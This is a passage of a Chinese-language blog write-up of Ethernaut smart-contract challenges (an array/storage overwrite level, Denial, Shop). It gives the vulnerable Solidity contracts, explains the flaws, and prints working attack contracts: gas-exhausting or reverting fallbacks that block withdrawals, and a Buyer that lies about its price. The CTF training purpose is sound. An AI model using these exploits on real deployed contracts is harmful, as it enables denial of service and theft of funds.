<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.4.24;<br><br>contract codex &#123;<br><br>    function cal() view returns(bytes32)&#123;<br>        return keccak256((bytes32(1)));<br>    &#125;<br>    //0xb10e2d527612073b26eecdfd717e6a320cf44b4afac2b0732d9fcbe2b7fa0cf6<br>&#125;<br></code></pre></td></tr></table></figure>
<p>y &#x3D; 2^256 - keccak256(1)&#x3D;0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a<br>然后调用revise函数，第二个参数必须补全32位。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">await</span> contract.<span class="hljs-title function_">revise</span>(<br>    <span class="hljs-string">&quot;0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a&quot;</span>,<br>    <span class="hljs-string">&quot;0x000000000000000000000000D15e151C53bfbDcaf21f5FC849167c526c5A4572&quot;</span>)<br></code></pre></td></tr></table></figure>
<p>然后就可以通关了。</p>
<h3 id="Denial"><a href="#Denial" class="headerlink" title="Denial"></a>Denial</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>contract Denial &#123;<br>    address public partner; // withdrawal partner - pay the gas, split the withdraw<br>    address public constant owner = address(0xA9E);<br>    uint256 timeLastWithdrawn;<br>    mapping(address =&gt; uint256) withdrawPartnerBalances; // keep track of partners balances<br><br>    function setWithdrawPartner(address _partner) public &#123;<br>        partner = _partner;<br>    &#125;<br><br>    // withdraw 1% to recipient and 1% to owner<br>    function withdraw() public &#123;<br>        uint256 amountToSend = address(this).balance / 100;<br>        // perform a call without checking return<br>        // The recipient can revert, the owner will still get their share<br>        partner.call&#123;value: amountToSend&#125;(&quot;&quot;);<br>        payable(owner).transfer(amountToSend);<br>        // keep track of last withdrawal time<br>        timeLastWithdrawn = block.timestamp;<br>        withdrawPartnerBalances[partner] += amountToSend;<br>    &#125;<br><br>    // allow deposit of funds<br>    receive() external payable &#123;&#125;<br><br>    // convenience function<br>    function contractBalance() public view returns (uint256) &#123;<br>        return address(this).balance;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>这是一个简单的钱包，会随着时间的推移而流失资金。您可以成为提款伙伴，慢慢提款。<br>通关条件： 在owner调用withdraw()时拒绝提取资金（合约仍有资金，并且交易的gas少于1M<br>要求阻止提取资金。</p>
<p>transfer与send相似，都为转账操作<br>transfer出错抛出异常<br>send、call出错不抛出异常，返回true或false<br>tansfer相对send更安全<br>send、call即便转账失败也会执行其后的代码<br>慎用call函数转账，容易发生重入攻击。</p>
<h4 id="Analyse-6"><a href="#Analyse-6" class="headerlink" title="Analyse"></a>Analyse</h4><p>本题会通过call以及transfer函数来进行转账。每当用户提款时，会调用withdraw函数，取出1%发给partner，还有1%发给owner.<br>本题代码漏洞在于call函数没有检查返回值和指定gas。所以如果在调用call函数时消耗了所有的gas，那么call函数就会 触发 out of gas错误，而之后的transfer函数也会因为gas不足而导致失败。<br>这里有两种思路，一种是通过循环不断消耗gas，另外一种是通过assert来做条件检查</p>
<p>assert 抛出panic错误时会终止执行。</p>
<h4 id="Attack-3"><a href="#Attack-3" class="headerlink" title="Attack"></a>Attack</h4><h5 id="第一种"><a href="#第一种" class="headerlink" title="第一种"></a>第一种</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.6.0;<br>contract Attack &#123;<br>    address public target;<br>    constructor(address payable _addr)public payable&#123;<br>        target=_addr;<br>        target.call(abi.encodeWithSignature(&quot;setWithdrawPartner(address)&quot;, address(this)));<br>    &#125;<br><br>    fallback() payable external &#123;<br>        while(true)&#123;<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>


<h5 id="第二种"><a href="#第二种" class="headerlink" title="第二种"></a>第二种</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.6.0;<br>contract DenialAttack &#123;<br>    fallback() external payable &#123;<br>        assert(false);<br>    &#125;<br>&#125;<br><br></code></pre></td></tr></table></figure>
<p>然后执行await contract.setWithdrawPartner(“0x03e1a1cf7fc319822355dce72c50b368094546ef”)</p>
<h3 id="Shop"><a href="#Shop" class="headerlink" title="Shop"></a>Shop</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs solidity">// SPDX-License-Identifier: MIT<br>pragma solidity ^0.8.0;<br><br>interface Buyer &#123;<br>    function price() external view returns (uint256);<br>&#125;<br><br>contract Shop &#123;<br>    uint256 public price = 100;<br>    bool public isSold;<br><br>    function buy() public &#123;<br>        Buyer _buyer = Buyer(msg.sender);<br><br>        if (_buyer.price() &gt;= price &amp;&amp; !isSold) &#123;<br>            isSold = true;<br>            price = _buyer.price();<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>Сan you get the item from the shop for less than the price asked?</p>
<p>Things that might help:<br>Shop expects to be used from a Buyer<br>Understanding restrictions of view functions<br>要求少于规定的price。提供price查询方法，当购买时查询一下buyer.price。购买成功后记录buyer.price。也就是我们只要在成功购买后给一个更低的price即可。<br>本题是一个购买合约，要求购买时价格小于规定的价格。  </p>
<h4 id="Analyse-7"><a href="#Analyse-7" class="headerlink" title="Analyse"></a>Analyse</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs solidity">if (_buyer.price() &gt;= price &amp;&amp; !isSold) &#123;<br>    isSold = true;<br>    price = _buyer.price();<br>&#125;<br></code></pre></td></tr></table></figure>
<p>发现第一次使用buy函数时时false，但是当第二次使用该函数的时候，isSold为true，就在这里修改price即可。</p>
<h4 id="Attack-4"><a href="#Attack-4" class="headerlink" title="Attack"></a>Attack</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs solidity">pragma solidity ^0.8.0;<br><br>interface IShop&#123;<br>    function buy() external;<br>    function isSold() external view returns(bool);<br>&#125;<br><br>contract Attack&#123;<br>    IShop  public shop;<br>    constructor(address _target)&#123;<br>        shop = IShop(_target);<br>    &#125;<br>    function price() external view  returns(uint256)&#123;<br>        return shop.isSold() ?0 :100 ;<br>    &#125;<br>    <br>    function buyAttack() external &#123;<br>        shop.buy();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>根据isSold（）函数修改price（）函数的返回值</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Blockchain/" class="category-chain-item">Blockchain</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Ethernaut</div>
      <div>http://xiaoxiaoxiaoxiaocai.github.io.com/2023/11/27/Ethernaut/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>xiaocai</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>November 27, 2023</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/03/04/Pyjail%E4%B8%8B/" title="Pyjail下">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Pyjail下</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/11/21/CREATE2/" title="CREATE2">
                        <span class="hidden-mobile">CREATE2</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>
  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
